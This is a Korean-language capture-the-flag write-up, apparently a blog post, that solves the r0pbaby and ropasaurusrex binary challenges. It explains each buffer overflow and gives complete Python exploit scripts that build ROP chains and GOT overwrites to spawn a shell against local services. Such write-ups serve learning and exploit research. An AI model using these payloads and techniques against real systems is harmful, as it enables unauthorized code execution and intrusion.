Ye0nny

r0pbaby_542ee6516410709a1421141501f03760

(환경 : Ubuntu 16.04,  libc.so.6)

 PIE와 NX 보호기법이 걸려있는 64bit ELF 파일이다.

프로그램을 실행시켜보았다.

1번에서 libc의 주소값을 얻을 수있고, 2번에서 입력한 심볼의 주소값을 얻을 수 있다.

그리고 3번에서는 설정한 크기만큼 값을 입력받게 된다.

코드를 보면 3번을 선택했을 경우 memcpy()를 통해 설정한 크기만큼 데이터를 입력받아 &savedregs에 복사하게 된다.

savedregs의 주소로 가보니 sfp와 ret가 존재하였다.

즉, 값을 8byte 이상 입력하면 sfp부터 채우게 되어 오버플로우가 발생하게 될 것이다.

크기를 16으로 지정한 뒤 값을 입력해보면 Segmentation fault가 뜨는 것을 확인할 수 있다.

ROP를 이용하여 이곳을 공략하면 된다.

64비트에서는 첫 번째 인자값을 버퍼가 아닌 레지스터 rdi에서 가져오게 된다. 

(레지스터 rdi, rsi, rdx, rcx, r8, r9 순으로 파라미터 전달)

따라서 rdi에 "/bin/sh"를 넣고 system() 함수로 실행시키게 된다면 쉘이 실행될 것이다. 

공격 페이로드는 다음과 같다.

"A"*8  |  &"pop rdi ; ret"  |  &"/bin/sh"  |  system()

먼저 libc.so 파일을 이용해 system 함수의 offset을 구해준다.

/bin/sh 주소와 "pop rdi" 가젯은 다음과 같은 방법으로 구할 수 있다.

rp++을 사용하면 가젯을 쉽게 구할 수 있다.

필요한 값들은 다 구했으니 이제 exploit 코드를 작성하여 쉘을 획득하는 일만 남았다.

[ Exploit Code ]

from struct import *

from socket import *

from time import *

import telnetlib

p = lambda x : pack("<Q", x)

up = lambda x : unpack("<Q", x)

def get_shell(s):

t=telnetlib.Telnet()

t.sock = s

t.interact()

s = socket(AF_INET, SOCK_STREAM)

s.connect(('127.0.0.1', 3213))

system_offset = 0x45380

pop_rdi_offset = 0x21102

binsh_offset = 0x18c58b

# Get libc_addr

s.recv(1024)

s.send("2\n")

s.recv(1024)

s.send("system\n")

system_addr = int(s.recv(1024).split()[2], 16)

libc_addr = system_addr -  system_offset

print "[*] system_addr 0x%x " % system_addr

print "[*] libc_addr 0x%x " % libc_addr

# Exploit

payload = ''

payload += "a"*8

payload += p(libc_addr + pop_rdi_offset)

payload += p(libc_addr + binsh_offset)

payload += p(system_addr)

s.recv(1024)

s.send("3\n")

s.recv(1024)

s.send("%d\n" %(len(payload)+1))

s.send(payload+"\n")

s.send("4\n")

get_shell(s)

ropasaurusrex

(환경 : Ubuntu 16.04,  libc.so.6)

문제를 풀기 위해 xinetd를 사용하여 환경 세팅을 해주었다.

세팅을 완료한 후 원격으로 문제에 접속을 하였다.

특정한 값을 입력받으면 WIN을 돌려보내주는 프로그램인 것 같다.

해당 문제에는 NX(No Excutable) 보호기법이 적용되어있었다.

IDA를 통해 바이너리를 살펴보니  sub_80483F4() 라는 함수가 존재하였고, return을 통해 write()를 반환하고 있었다.

sub_80483F4() 함수를 살펴보았다. 

이곳에 취약점이 존재하는 것을 알 수 있다.

buf의 최대 크키가 136(88h)인데 read 함수를 통해 받는 값 크기는 256이다. 따라서 bof가 일어나게 된다.

A를 136개 입력했을 때는 'WIN'이 떴으나, 140개부터는 뜨지 않는 것을 통해 알 수 있다.

ROP를 통해 이 문제를 풀 수 있다.

1. system의 인자값("bin/sh")를 쓰기 가능한 메모리 영역(.dynamic, .data , .bss 등)에 복사

2. write@plt를 사용하여 read함수의 got를 구한다.

3. read함수의 got와 offset값을 이용해 system의 주소를 구한다.

4. read_got 값을 system 주소로 덮어버린다.

5. system 함수 호출

[ Exploit Code ]

from socket import *

from struct import *

from time import *

p = lambda x : pack("<I", x)

up = lambda x : unpack("<I", x)[0]

ip = '127.0.0.1'

port = 6666

s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))

read_plt = 0x804832c

read_got = 0x804961c

write_plt = 0x804830c

offset = 0x99b00 # libc.so.6 read - system

binsh_addr = 0x8049530

pppr = 0x80484b6

cmd = "/bin/sh\x00"

payload = ''

payload += "A"*140 # buf 136 + sfp

# binsh_addr

payload += p(read_plt)

payload += p(pppr)

payload += p(0)

payload += p(binsh_addr)

payload += p(len(cmd))

# libc

payload += p(write_plt)

payload += p(pppr)

payload += p(1)

payload += p(read_got)

payload += p(4)

# read -> system

payload += p(read_plt)

payload += p(pppr)

payload += p(0)

payload += p(read_got)

payload += p(4)

#system

payload += p(read_plt)

payload += "AAAA"

payload += p(binsh_addr)

print "[*] send payload..."

s.send(payload + "\n")

s.send(cmd)

libc_offset = up(s.recv(4))

system_addr = libc_offset - offset

sleep(1)

s.send(p(system_addr))

# Get shell

while 1:

    input_string = raw_input('$ ')

    s.send(input_string + "\n")

    if input_string == 'exit':

       s.close()

       break

    print s.recv(1024)